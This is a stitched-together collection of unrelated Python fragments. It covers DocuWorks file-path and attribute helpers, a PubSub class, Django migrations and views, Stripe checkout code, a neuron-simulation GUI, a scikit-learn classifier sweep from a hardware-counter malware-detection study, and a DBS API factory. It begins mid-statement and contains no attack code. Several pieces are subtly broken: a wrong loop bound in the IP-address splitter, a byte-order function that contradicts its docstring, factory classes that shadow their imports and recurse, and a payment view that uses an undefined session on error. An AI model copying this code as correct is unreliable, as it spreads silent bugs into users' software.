OpenKey(HKEY_LOCAL_MACHINE, f"SOFTWARE\\{vendor}\\MPM3"), incompats[n])[0]) try: return uc(XDW_GetInformation(n)) except InfoNotFoundError as e: return None if name: return getvalue(name) values = dict() for v in XDW_ENVIRON.values(): if ((v == "TASKSPACEPATH" and XDWVER < 8) or (v == "OCRENABLER_STATE" and XDWVER < 9)): continue c = getvalue(v) if c is not None: values[v] = c return values def linkfolders(): result = dict() for i in range(XDW_GetLinkRootFolderNumber()): info = XDW_GetLinkRootFolderInformation(i + 1) result[info.szLinkRootFolderName.decode(CODEPAGE)] = \ info.szPath.decode(CODEPAGE) return result def get_viewer(light=False, lightonly=False): """Get pathname of DocuWorks Viewer (Light). light (bool) force to use DocuWorks Viewer Light. 
Note that DocuWorks Viewer is used if Light version is not avaiable. """ env = environ() viewer = env.get("DWVIEWERPATH") if light or not viewer: viewer = env.get("DWVLTPATH", viewer) if not viewer: raise NotInstalledError("DocuWorks Viewer (Light) is not installed") return viewer def joinf(sep, seq): """sep.join(seq), omitting None, null or so.""" return sep.join([s for s in filter(bool, seq)]) or None def inner_attribute_name(name): """Get XDWAPI style attribute name e.g. font_name --> %FontName""" if isinstance(name, bytes): return name if name.startswith("%"): return cp(name) if "A" <= name[0] <= "Z": return cp("%" + name) return cp("%" + "".join([s.capitalize() for s in name.split("_")])) def outer_attribute_name(name): """Get xdwlib style attribute name e.g. %FontName --> font_name""" if isinstance(name, str): return name name = uc(name) if not name.startswith("%"): return name return re.sub("([A-Z])", r"_\1", name[1:])[1:].lower() def adjust_path(path, dir="", ext=".xdw", coding=None): """Build a new pathname with filename and directory name. path (str) pathname Full pathname is acceptable as well as bare filename (basename). dir (str) replacement directory ext (str) default extension to append if original path has no one coding (str) encoding of the result as bytes; None = str (don't encode) Returns a full pathname. Example: >>> import os; os.getcwd() 'C:\\your\\favorite\\directory' >>> adjust_path('') '' >>> adjust_path('example.xdw') 'C:\\your\\favorite\\directory\\example.xdw' >>> adjust_path('example.xdw', dir='C:\\another\\directory') 'C:\\another\\directory\\example.xdw' >>> adjust_path('C:\\your\\favorite\\directory\\example.xdw', ... dir='C:\\another\\directory') 'C:\\another\\directory\\example.xdw' >>> adjust_path('example.xdw', dir='C:\\another\\directory', ext='.pdf') 'C:\\another\\directory\\example.xdw' >>> adjust_path('example', dir='C:\\another\\directory', ext='.pdf') 'C:\\another\\directory\\example.pdf' """ if not (path or dir): return "" directory, basename = os.path.split(path) directory = dir or directory or os.getcwd() path = os.path.abspath(os.path.join(directory, basename)) if basename and not os.path.splitext(basename)[1]: path += "." + ext.lstrip(".") if coding and isinstance(path, str): path = path.encode(coding) return path def cp(s): """Coerce str into bytes.""" if not s: return b"" if isinstance(s, str): return s.encode(CODEPAGE) if isinstance(s, bytes): return s raise TypeError(f"str or bytes expected, {s.__class__} given") def uc(s): """Coerce bytes into str.""" if not s: return "" if isinstance(s, bytes): return s.decode(CODEPAGE) if isinstance(s, str): return s raise TypeError(f"str or bytes expected, {s.__class__} given") def derivative_path(path): """Convert pathname to n-th derivative e.g. somedocument-2.xdw or so. Addtional number (2, 3, ...) is determined automatically. If pathname given does not exist, original pathname is returned. 
""" if not os.path.exists(path): return path root, ext = os.path.splitext(path) n = 2 derivative = f"{root}-{n}{ext}" while os.path.exists(derivative): n += 1 derivative = f"{root}-{n}{ext}" return derivative def newpath(path, dir="", ext=".xdw", coding=None): """Build a new pathname available for output.""" def eval(path): return path() if callable(path) else path if not path: path = adjust_path(eval(path), dir=dir, ext=ext, coding=coding) elif not os.path.dirname(path): path = adjust_path(eval(path), dir=dir) else: path = adjust_path(eval(path)) return derivative_path(path) def flagvalue(table, value, store=True): """Sum up flag values according to XDWConst table.""" if store and isinstance(value, (int, float)): return int(value) if store: if not value: return 0 value = [table.normalize(f.strip()) for f in value.split(",") if f] if not value: return 0 return reduce(lambda x, y: x | y, value) return ",".join(table[b] for b in sorted(table.keys()) if b & value) def typevalue(value): """Get XDWAPI-compatible type and ctypes-compatible value.""" if isinstance(value, bool): return (XDW_ATYPE_BOOL, c_int(-1 if value else 0)) if isinstance(value, int): return (XDW_ATYPE_INT, c_int(value)) #elif isinstance(value, bytes): # return (XDW_ATYPE_STRING, value) elif isinstance(value, str): return (XDW_ATYPE_STRING, value) elif isinstance(value, datetime.date): value = int(time.mktime(value.timetuple()) - time.timezone) return (XDW_ATYPE_DATE, c_int(value)) else: return (XDW_ATYPE_OTHER, value) def makevalue(t, value): """Get value of ctypes-compatible value in XDWAPI-compatible type.""" t = XDW_ATTRIBUTE_TYPE.normalize(t) if t == XDW_ATYPE_INT: return int(value) elif t == XDW_ATYPE_STRING: return str(value) elif t == XDW_ATYPE_DATE: return datetime.date.fromtimestamp(value + time.timezone) elif t == XDW_ATYPE_BOOL: return bool(value) return value def scale(attrname, value, store=False): """Scale actual size (length) to stored value and vice versa.""" unit = XDW_ANNOTATION_ATTRIBUTE[attrname][1] if not unit: return value if isinstance(unit, XDWConst): if attrname in (XDW_ATN_FontStyle, XDW_ATN_FontPitchAndFamily): return flagvalue(unit, value, store=store) if store: return unit.normalize(value) return unit[value] mo = re.match(r"(1/)?([\d.]+)", unit) if not mo: return float(value) inv, unit = mo.groups() if bool(inv) ^ store: return value / float(unit) else: return value * float(unit) def unpack(s): """Unpack little-endian octets into int.""" n = 0 for c in s: n <<= 8 n += ord(c) return n CHARSET_CODEPAGE = { DEFAULT_CHARSET: CP, ANSI_CHARSET: 1252, SYMBOL_CHARSET: 899, MAC_CHARSET: 10000, SHIFTJIS_CHARSET: 932, HANGEUL_CHARSET: 949, CHINESEBIG5_CHARSET: 950, GREEK_CHARSET: 869, TURKISH_CHARSET: 1026, BALTIC_CHARSET: 775, RUSSIAN_CHARSET: 855, EASTEUROPE_CHARSET: 852, OEM_CHARSET: 65001, } CODEPAGE_CHARSET = {cp: cs for (cs, cp) in CHARSET_CODEPAGE.items()} def charset_to_codepage(charset): return CHARSET_CODEPAGE.get(XDW_FONT_CHARSET.normalize(charset), CP) def codepage_to_charset(codepage): return CODEPAGE_CHARSET.get(codepage, OEM_CHARSET) def set_ansi_charset(codepage): CHARSET_CODEPAGE[ANSI_CHARSET] = codepage def set_oem_charset(codepage): CHARSET_CODEPAGE[OEM_CHARSET] = codepage # MIT License # # Copyright (c) 2021 # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, 
distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. class PubSub(object): _subscriptions: dict def __init__(self): self._subscriptions = {} def has_channel(self, channel: str) -> bool: """ checks if the _subscriptions variable has the channel as a key :param channel: str :rtype: bool :return: True if it has the channel as a key """ return channel in self._subscriptions.keys() def channel_has_key(self, channel: str, key: int) -> bool: """ :param channel: used for calling self.has_channel internally :param key: used for checking if this key exists :rtype: bool :return: True if the key exists in the channel """ if not self.has_channel(channel): return False return key in self._subscriptions[channel].keys() def get_subscription_count(self, channel: str) -> int: """ gets the count of keys in channel :param channel: str :rtype: int :return: -1 if the channel does not exist else the count of keys """ if not self.has_channel(channel): return -1 return len(self._subscriptions[channel].keys()) def publish(self, channel: str, message) -> bool: """ publish a message to the channel :param channel: str :param message: Any python object :rtype: bool :return: False if the channel does not exist else true """ if not self.has_channel(channel): return False for sub in self._subscriptions[channel].values(): sub(message) return True def pub(self, channel: str, msg) -> bool: """ this is a shorthand function for publish :param channel: str :param msg: Any python object :rtype: bool :return: False if the channel does not exist else true """ return self.publish(channel, msg) def p(self, channel: str, msg) -> bool: """ this is a shorthand function for publish :param channel: str :param msg: Any python object :rtype: bool :return: False if the channel does not exist else true """ return self.publish(channel, msg) def subscribe(self, channel: str, callback) -> int: """ add a callback function to a channel :param channel: str :param callback: function which shall be called when new data comes in :rtype: int :return: the key, which has been assigned to the callback """ if not self.has_channel(channel): self._subscriptions[channel] = {} k = self.get_subscription_count(channel) + 1 self._subscriptions[channel][k] = callback return k def sub(self, channel: str, cb) -> int: """ shorthand function for subscribe :param channel: str :param cb: function which shall be called when new data comes in :rtype: int :return: the key, which has been assigned to the callback """ return self.subscribe(channel, cb) def s(self, channel: str, cb) -> int: """ shorthand function for subscribe :param channel: str :param cb: function which shall be called when new data comes in :rtype: int :return: the key, which has been assigned to the callback """ return self.subscribe(channel, cb) def unsubscribe(self, channel: str, key: int) -> 
bool: """ deletes a callback by its key from a channel :param channel: str :param key: the previously obtained key :rtype: bool :return: False if the channel or key does not exist else True """ if not self.channel_has_key(channel, key): return False del self._subscriptions[channel][key] return True def unsub(self, channel: str, key: int) -> bool: """ shorthand function for unsubscribe :param channel: str :param key: the previously obtained key :rtype: bool :return: False if the channel or key does not exist else True """ return self.unsubscribe(channel, key) def u(self, channel: str, key: int) -> bool: """ shorthand function for unsubscribe :param channel: str :param key: the previously obtained key :rtype: bool :return: False if the channel or key does not exist else True """ return self.unsubscribe(channel, key) def clear(self) -> None: """ remove all callbacks from all channels """ self._subscriptions.clear() def clear_channel(self, channel: str) -> bool: """ remove all callbacks from a specific channel :param channel: str :rtype: bool :return: False if the channel does not exist else True """ if not self.has_channel(channel): return False self._subscriptions[channel].clear() return True __all__ = ["PubSub"] drevicko/OpenKI # Copyright (c) 2020. CSIRO Australia. # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated # documentation files (the "Software"), to deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all copies or substantial portions of # the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO # THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
# # from OpenKI.OpenKI_Data import * # from OpenKI.RelationScorers import * # from OpenKI.LossFunctions import * # from OpenKI.Constants import * # from OpenKI.Evaluation import * # from OpenKI.UtilityFunctions import * import logging import sys logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) logging_handler = logging.StreamHandler(sys.stdout) logging_handler.setLevel(logging.INFO) logging_formatter = logging.Formatter(fmt='%(levelname).1s %(asctime)s [%(filename)s:%(lineno)s] %(message)s', datefmt='%m-%d %H:%M:%S') logging_handler.setFormatter(logging_formatter) logger.addHandler(logging_handler) # workaround for double logging issue from absl introduced by tensorboard logger.propagate = False # # NOTE: alternative workaround for absl ouble logging issue: # import absl.logging # logging.root.removeHandler(absl.logging._absl_handler) # absl.logging._warn_preinit_stderr = False mjovanc/tidlundsved # Generated by Django 2.0.2 on 2018-03-02 17:35 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('ved', '0004_auto_20180302_1732'), ] operations = [ migrations.AlterField( model_name='order', name='product_type', field=models.CharField(choices=[('Blandat lövträd', 'Blandat lövträd'), ('Björkved', 'Björkved'), ('Bokved', 'Bokved'), ('Askved', 'Askved'), ('Övrigt', 'Övrigt')], default=1, max_length=50), ), ] Rasoul-Jahanshahi/Hardware_Performance_Counters_Can_Detect_Malware_Myth_or_Fact import learn_all_boyou, learn_1k_cv, \ logging, sys, random, os, time, json, itertools import numpy as np from sklearn.model_selection import StratifiedKFold class learn_1k_cv_optimization(learn_1k_cv.learn_1k_cv): def setup_classifiers(self): """ setup_classifiers only generate the classifier class objects. nothing more. Note that KNeighborsClassifier is inherited from learn_all_boyou instead of sklearn (learn_all_boyou inherits the implements from sklearn). 
""" # self.names = [\ # "Nearest Neighbors", \ # "Decision Tree", \ # "Random Forest", \ # "AdaBoost", \ # "Naive Bayes",\ # "Neural Net" \ # #### "Logistic Regression",\ # #### "Linear SVM", "Rbf SVM", "Poly SVM", "Sigmoid SVM"\ # ####, "Gaussian Process" # ] max_iterations = 1000 # self.classifiers = [ \ # learn_all_boyou.KNeighborsClassifier(\ # n_neighbors=7, weights='uniform', algorithm='auto', n_jobs=-1),\ # learn_all_boyou.DecisionTreeClassifier(\ # max_depth=17, min_samples_split=12, min_samples_leaf=12,\ # presort=True, max_features=None,\ # random_state=int(round(time.time()))),\ # learn_all_boyou.RandomForestClassifier(max_depth=100, min_samples_split=12,\ # min_samples_leaf=12, \ # n_estimators=100, max_features=None,\ # random_state=int(round(time.time()))), \ # learn_all_boyou.AdaBoostClassifier(algorithm='SAMME.R', n_estimators=200, \ # random_state=int(round(time.time()))),\ # learn_all_boyou.GaussianNB(priors=[0.5, 0.5]),\ # learn_all_boyou.MLPClassifier(hidden_layer_sizes=(100,100,100,100), \ # alpha=100, solver='lbfgs',\ # max_iter=max_iterations,\ # activation='tanh', tol=1e-5,\ # warm_start='True') \ # #### LogisticRegression(penalty='l2', tol=1e-4, C=1e2,\ # #### fit_intercept=True, solver='lbfgs', \ # #### class_weight='balanced', max_iter=max_iterations), \ # #### SVC(kernel="linear", C=1e2, tol=1e-4, max_iter=max_iterations,\ # #### probability= True),\ # #### SVC(kernel="rbf", C=1e2, tol=1e-4, max_iter=max_iterations,\ # #### probability=True, shrinking=True), # #### SVC(kernel="poly", C=1e2, degree=4, tol=1e-4,\ # #### max_iter=max_iterations, probability=True),\ # #### SVC(kernel="sigmoid", C=1e2, gamma=1e-1, tol=1e-3, \ # #### max_iter=max_iterations, probability=True, \ # #### shrinking=True)#,\ # #### GaussianProcessClassifier(1.0 * RBF(1.0), n_jobs=-1, \ # #### copy_X_train=False, \ # #### max_iter_predict=100, warm_start=False )\ # ] self.classifiers = list(\ itertools.chain(\ [learn_all_boyou.KNeighborsClassifier(\ n_neighbors=parameter_i, \ weights='uniform', \ algorithm='auto', \ n_jobs=-1) \ for parameter_i in list(xrange(38, 68, 3))],\ [learn_all_boyou.DecisionTreeClassifier(\ max_depth=parameter_i, \ min_samples_split=12, \ min_samples_leaf=12,\ presort=True, max_features=None,\ random_state=int(round(time.time()))) \ for parameter_i in list(xrange(35, 45, 1))],\ [learn_all_boyou.RandomForestClassifier(\ max_depth=parameter_i, \ min_samples_split=12,\ min_samples_leaf=12, \ n_estimators=100, max_features=None,\ random_state=int(round(time.time()))) \ for parameter_i in list(xrange(30, 40, 1))],\ [learn_all_boyou.AdaBoostClassifier(\ algorithm='SAMME.R', \ n_estimators=parameter_i, \ random_state=int(round(time.time()))) for parameter_i in list(xrange(300, 1300, 100))],\ [learn_all_boyou.GaussianNB(\ priors=[0.5, 0.5])],\ [learn_all_boyou.MLPClassifier(\ hidden_layer_sizes=(parameter_i,parameter_i,parameter_i), \ alpha = 5, \ solver='lbfgs',\ max_iter=max_iterations,\ activation='tanh', tol=1e-5,\ warm_start='True') \ for parameter_i in list(xrange(3, 53, 5))]\ )\ ) self.names = list (\ itertools.chain(\ ["Nearest Neighbors: " + \ json.dumps(self.classifiers[parameter_i].get_params()) \ for parameter_i in list(xrange(0, 10))],\ ["Decision Tree: " + \ json.dumps(self.classifiers[parameter_i].get_params()) \ for parameter_i in list(xrange(10, 20))],\ ["Random Forest: " + \ json.dumps(self.classifiers[parameter_i].get_params()) \ for parameter_i in list(xrange(20, 30))],\ ["AdaBoost: " + \ json.dumps(self.classifiers[parameter_i].get_params()) \ for 
parameter_i in list(xrange(30, 40))],\ ["Naive Bayes: " + \ json.dumps(self.classifiers[40].get_params())], \ ["Neural Net: " + \ json.dumps(self.classifiers[parameter_i].get_params()) \ for parameter_i in list(xrange(41, 51))]\ )\ ) def classic_cross_validation(self): """ This function does 10 fold split for self.data and its label :class:`learn_all_boyou`. Data and label will be shuffled. The data and label is splited with granularity of single feature vector. :param dict self.report: simulation report dictionary :param array self.X_train: Training array :param array self.X_test: Testing array :param array self.y_train: Training label :param array self.y_test: Testing label :param list prediction: prediction results :param list predict_proba: prediction confidence """ self.logger.info('Start to cross validate ...') self.load_data() self.setup_classifiers() self.report = {} # random shuffling zipped_list = zip(self.data, self.label) random.shuffle(zipped_list) self.data, self.label = zip(*zipped_list) self.data = np.array(list(self.data)) self.label = np.array(list(self.label)) # 10 fold split cv = StratifiedKFold(n_splits = 10) experiment_path = self.result_path zipped_clfs = zip(self.names, self.classifiers) #for names, clf in zip(self.names, self.classifiers): names, clf = zipped_clfs[int(sys.argv[1].split('/')[-1])] self.logger.info(names + " in process ....") count = 0 for train_idx, test_idx in cv.split(self.data, self.label): self.X_train, self.X_test = self.data[train_idx], self.data[test_idx] self.y_train, self.y_test = self.label[train_idx], self.label[test_idx] clf.fit(self.X_train, self.y_train) self.result_path = experiment_path + str(count) + '/' count += 1 if not os.path.isdir(self.result_path): self.logger.info(self.result_path + " new folder created ....") os.mkdir(self.result_path) else: self.logger.info(self.result_path + " old directory exists ....") if os.path.isfile(self.result_path + 'classification_report.txt'): self.logger.info(self.result_path + " old report exists ....") with open(self.result_path + 'classification_report.txt', 'r') as outfile: self.report = json.load(outfile) outfile.close() self.prediction = clf.predict(self.X_test) self.text_class_report(names) self.predict_proba = clf.predict_proba(self.X_test) self.roc_curve_report(names) self.logger.info(names + " testing completed!") if __name__ == "__main__": logger = logging.getLogger() logger.setLevel(logging.DEBUG) logger_handler = logging.StreamHandler() logger_handler.setFormatter(\ logging.Formatter('%(asctime)s [%(levelname)s]\ %(filename)s [%(lineno)d]: %(funcName)s(): %(message)s')) logger.addHandler(logger_handler) learn1 = learn_1k_cv_optimization(logger, \ data_path_prefix='../amd_data/') #data_path_prefix='/home/bobzhou/2017_summer/data_analysis/amd_data_analysis/') learn1.result_path = sys.argv[1] + '/' logger.info("files will be saved in the following path: " + learn1.result_path) #learn1.run() learn1.classic_cross_validation() #learn1.test_rasoul() from secp256k1_zkp import GeneratorOnCurve from hashlib import sha256 seed = "Leer is experimental cryptocurrency implementing LubbaDubDub technology" def generator_from_string_seed(seed): m=sha256() m.update(seed.encode()) bytes_seed = m.digest() g = GeneratorOnCurve() g._from_seed(bytes_seed) g.initialise_bulletproof_generators(128) return g default_generator = generator_from_string_seed(seed) default_generator_ser=default_generator.serialize() generators = { default_generator_ser: default_generator} import sys import collections as _abc 
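# ---------------------------------------------------------------------------------------
# A hedged, self-contained sketch of the shuffled 10-fold StratifiedKFold procedure that
# the classic_cross_validation docstring further above describes. The toy arrays and the
# DecisionTreeClassifier below are illustrative stand-ins, not the experiment's real data,
# classifiers, or tuned parameters.
import numpy as np
from sklearn.model_selection import StratifiedKFold
from sklearn.tree import DecisionTreeClassifier

rng = np.random.default_rng(0)
X_toy = rng.random((100, 8))                   # stand-in feature vectors
y_toy = rng.integers(0, 2, 100)                # stand-in binary labels
cv_toy = StratifiedKFold(n_splits=10, shuffle=True, random_state=0)
for fold, (tr, te) in enumerate(cv_toy.split(X_toy, y_toy)):
    clf_toy = DecisionTreeClassifier(random_state=0).fit(X_toy[tr], y_toy[tr])
    print(f"fold {fold}: accuracy = {clf_toy.score(X_toy[te], y_toy[te]):.2f}")
# ---------------------------------------------------------------------------------------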
class range_iterator(object): __slots__ = ('_start', '_max_idx', '_step', '_current') def __init__(self, start, step, count, current=-1): """ Iterator over a `range`, for internal use only Argument `current` used for pickle support. """ self._start = start self._step = step self._max_idx = count - 1 self._current = current def __iter__(self): return self def _next(self): if self._current == self._max_idx: raise StopIteration self._current += 1 return self._start + self._step * self._current if sys.version_info < (3,): next = _next else: __next__ = _next def __length_hint__(self): # both stop and current are offset by 1 which cancels out here return self._max_idx - self._current # Pickling def __getstate__(self): return self._start, self._max_idx, self._step, self._current def __setstate__(self, state): self._start, self._max_idx, self._step, self._current = state # register at ABCs # do not use decorators to play nice with Cython _abc.Iterator.register(range_iterator) class Solution: def restoreIpAddresses(self, s: str) -> List[str]: valid_addresses = [] def is_legal_part(string): return 0 <= int(string) <= 255 and not (string[0] == '0' and len(string) > 1) for i in range(1, min(4, len(s))): for j in range(i + 1, min(i + 4, len(s))): for k in range(j + 1, min(i + j + 4, len(s))): if is_legal_part(s[:i]) and is_legal_part(s[i:j]) and is_legal_part(s[j:k]) and is_legal_part(s[k:]): valid_addresses.append('.'.join([s[:i], s[i:j], s[j:k], s[k:]])) return valid_addresses 0 """ Script for converting Budget pdfs Usage: converter.py --idir= [--odir=] [--fformat=] Options: --idir= Provide input directory that has all pdfs --odir= Provide output directory that should have the output files --fformat= Provide the output format, eg: txt, xml, html """ from docopt import docopt import subprocess import os if __name__ == "__main__": args = docopt(__doc__) idir = args["--idir"] odir = args["--odir"] fformat = args["--fformat"] if not fformat: fformat = "txt" for filename in os.listdir(idir): if filename.endswith(".pdf"): ofile = filename.split(".")[0] + "." + fformat if odir: ofile = odir + ofile ifile = idir + filename subprocess.call(['pdf2txt.py', "-o", ofile, ifile]) from django.conf import settings from django.shortcuts import render from rest_framework.decorators import api_view from rest_framework.response import Response from rest_framework import status import stripe import json import os # Create your views here. # payments/views.py stripe.api_key = '' @api_view(['POST']) def test_payment(request): test_payment_intent = stripe.PaymentIntent.create( amount=10000, currency='pln', payment_method_types=['card'], receipt_email='') return Response(status=status.HTTP_200_OK, data=test_payment_intent) @api_view(['POST']) def create_checkout_session(request): try: session = stripe.checkout.Session.create( payment_method_types=['card'], line_items=[{ 'price_data': { 'currency': 'usd', 'product_data': { 'name': 'Private Registration', }, 'unit_amount': 10000, }, 'quantity': 1, }], mode='payment', success_url=os.path.join(settings.SERVER_ADDRESS, 'dashboard'), cancel_url=os.path.join(settings.SERVER_ADDRESS, 'cancel'), ) except Exception as e: print(e) return Response({ 'id': session.id }, status=status.HTTP_200_OK)""" Graphical interface for controlling single *conductance-based* neuron behavior. Neuron consists of 4 conductance elements with single activation variables representing fast -ve, slow +ve, slow -ve, and ultra-slow +ve conductance. 
@author: Luka """ from gui_utilities import GUI from neuron_model import Neuron # Initial conductance parameters g1 = 0 E_rev1 = 30 # 'sodium' voff1 = -20 k1 = 0.1 g2 = 0 E_rev2 = -75 # 'potassium' voff2 = -20 k2 = 0.1 g3 = 0 E_rev3 = 140 # 'calcium' voff3 = -50 k3 = 0.15 g4 = 0 E_rev4 = -75 # 'potassium' voff4 = -50 k4 = 0.15 # Define timescales tf = 0 ts = 30 tus = 20*20 # Define an empty neuron and then interconnect the elements neuron = Neuron() R = neuron.add_conductance(1) i1 = neuron.add_conductance(g1, E_rev1) x1 = i1.add_gate(k1, voff1, tf) i2 = neuron.add_conductance(g2, E_rev2) x2 = i2.add_gate(k2, voff2, ts) i3 = neuron.add_conductance(g3, E_rev3) x3 = i3.add_gate(k3, voff3, ts) i4 = neuron.add_conductance(g4, E_rev4) x4 = i4.add_gate(k4, voff4, tus) gui = GUI(neuron, i0 = -50, vmin = -100, vmax = 20, dv = 1.0, time_step = 0.1, plot_fixed_point = True, ymin = -120, ymax = 20, sstep=10, tint=3000) gui.add_sim_plot([0.1, 0.45, 0.8, 0.2]) gui.add_IV_curve(neuron, "Fast", tf, [0.1, 0.75, 0.2, 0.2]) gui.add_IV_curve(neuron, "Slow", ts, [0.4, 0.75, 0.2, 0.2]) gui.add_IV_curve(neuron, "Ultraslow", tus, [0.7, 0.75, 0.2, 0.2]) gui.add_label(0.25, 0.34, "Fast -ve") s1 = gui.add_slider("$g_{max}$", [0.1, 0.3, 0.3, 0.03], 0, 10, g1, i1.update_g_max) s2 = gui.add_slider("$V_{off}$", [0.1, 0.25, 0.3, 0.03], -75, 0, voff1, x1.update_voff) gui.add_label(0.25, 0.19, "Slow +ve") s3 = gui.add_slider("$g_{max}$", [0.1, 0.15, 0.3, 0.03], 0, 10, g2, i2.update_g_max) s4 = gui.add_slider("$V_{off}$", [0.1, 0.1, 0.3, 0.03], -75, 0, voff2, x2.update_voff) gui.add_label(0.75, 0.34, "Slow -ve") s5 = gui.add_slider("$g_{max}$", [0.6, 0.3, 0.3, 0.03], 0, 10, g3, i3.update_g_max) s6 = gui.add_slider("$V_{off}$", [0.6, 0.25, 0.3, 0.03], -75, 0, voff3, x3.update_voff) gui.add_label(0.75, 0.19, "UltraSlow +ve") s7 = gui.add_slider("$g_{max}$", [0.6, 0.15, 0.3, 0.03], 0, 10, g4, i4.update_g_max) s8 = gui.add_slider("$V_{off}$", [0.6, 0.1, 0.3, 0.03], -75, 0, voff4, x4.update_voff) s9 = gui.add_iapp_slider([0.1, 0.02, 0.5, 0.03], -100, 0) b = gui.add_button("Pause", [0.8, 0.02, 0.1, 0.03], gui.pause) gui.run()Thrayz/agfzb-CloudAppDevelopment_Capstone from django.shortcuts import render from django.http import HttpResponseRedirect, HttpResponse from django.contrib.auth.models import User from django.shortcuts import get_object_or_404, render, redirect from .models import CarDealer, CarMake, CarModel from .restapis import get_dealers_from_cf, get_dealer_reviews_from_cf from django.contrib.auth import login, logout, authenticate from django.contrib import messages from datetime import datetime import logging import json # Get an instance of a logger logger = logging.getLogger(__name__) # Create your views here. 
def index(request):
    return render(request, 'djangoapp/index.html')


# Create an `about` view to render a static about page
def about(request):
    return render(request, 'djangoapp/about.html')


# Create a `contact` view to return a static contact page
def contact(request):
    return render(request, 'djangoapp/contact.html')


# Create a `login_request` view to handle sign in request
def login_request(request):
    if request.method == "POST":
        username = request.POST['username']
        password = request.POST['']
        user = authenticate(username=username, password=password)
        if user is not None:
            login(request, user)
            return redirect('djangoapp:index')
        else:
            return render(request, 'djangoapp/registration.html', {})


# Create a `logout_request` view to handle sign out request
def logout_request(request):
    print("Log out the user `{}`".format(request.user.username))
    logout(request)
    return redirect('djangoapp:index')


# Create a `registration_request` view to handle sign up request
def registration_request(request):
    if request.method == "GET":
        return render(request, 'djangoapp/registration.html', {})
    elif request.method == "POST":
        username = request.POST['username']
        password = request.POST['']
        first_name = request.POST['firstname']
        last_name = request.POST['lastname']
        user_exist = False
        try:
            User.objects.get(username=username)
            user_exist = True
        except User.DoesNotExist:
            logger.debug("{} is new user".format(username))
        if not user_exist:
            # Create user in auth_user table
            user = User.objects.create_user(username=username, first_name=first_name,
                                            last_name=last_name, password=password)
            login(request, user)
            return redirect('djangoapp:index')
        else:
            return render(request, 'djangoapp/registration.html', {})


# Update the `get_dealerships` view to render the index page with a list of dealerships
def get_dealerships(request):
    if request.method == "GET":
        url = "https://cf61a9d5.eu-gb.apigw.appdomain.cloud/dealerships/dealerships"
        # Get dealers from the URL and pass them to the template context
        dealerships_list = get_dealers_from_cf(url)
        context = {"dealerships_list": dealerships_list}
        return render(request, 'djangoapp/index.html', context)


# Create a `get_dealer_details` view to render the reviews of a dealer
def get_dealer_details(request, dealer_id):
    if request.method == "GET":
        url = "https://cf61a9d5.eu-gb.apigw.appdomain.cloud/get_reviews/get_reviews?dealerId=" + \
            str(dealer_id)
        # Get this dealer's reviews from the URL
        reviews_list = get_dealer_reviews_from_cf(url)
        context = {"reviews_list": reviews_list, "dealer_id": dealer_id}
        return render(request, 'djangoapp/dealer_details.html', context)


# Create an `add_review` view to submit a review (an illustrative sketch follows below)
# def add_review(request, dealer_id):
# ...
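# ---------------------------------------------------------------------------------------
# A hedged sketch of what an `add_review` view could look like, following the stub above.
# It is not the original implementation: the post URL, the payload field names, and the
# use of the `requests` library are assumptions made for illustration only.
import requests


def add_review(request, dealer_id):
    if request.method == "POST" and request.user.is_authenticated:
        url = "https://cf61a9d5.eu-gb.apigw.appdomain.cloud/post_review/post_review"  # assumed endpoint
        review = {
            "dealership": dealer_id,
            "name": request.user.username,
            "review": request.POST.get("content", ""),
            "purchase": request.POST.get("purchasecheck") == "on",
            "purchase_date": datetime.utcnow().isoformat(),
        }
        # POST the review payload to the assumed cloud function endpoint
        requests.post(url, json={"review": review})
    return redirect('djangoapp:index')
# ---------------------------------------------------------------------------------------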
from __future__ import print_function from dbs.apis.dbsClient import DbsApi from DataProvider.core.dbs_provider import DBSDataProvider from DataProvider.core.phedex_provider import PhedexDataProvider class DBS3ApiFactory(object): def __init__(self, config): self.config = config or {} def get_api(self): return DbsApi(url=self.config.get("url", "https://cmsweb.cern.ch:8443/dbs/int/global/DBSReader/")) class DBSDataProvider(object): def __init__(self, config): self.config = config or {} def get_api(self): return DBSDataProvider(**self.config) class PhedexDataProvider(object): def __init__(self, config): self.config = config or {} def get_api(self): return PhedexDataProvider() def create_api(api="DbsApi", config=None): known_factory = {'DbsApi': DBS3ApiFactory(config), 'DBSDataProvider': DBSDataProvider(config), 'PhedexDataProvider': PhedexDataProvider(config)} factory = known_factory.get(api, None) if not factory: raise NotImplementedError("A factory for api %s has not yet been implemented." % (api)) return factory.get_api() if __name__ == "__main__": api = create_api(api="DbsApi", config=dict(url="https://cmsweb.cern.ch:8443/dbs/int/global/DBSReader/")) print(dir(api)) test_actors_labelisation.py import unittest from actors_labelisation import imputation_previous_value,labelisation import fonction_traitement as trait import pandas as pd from numpy import nan as Nan import numpy as np #dataframes building for tests 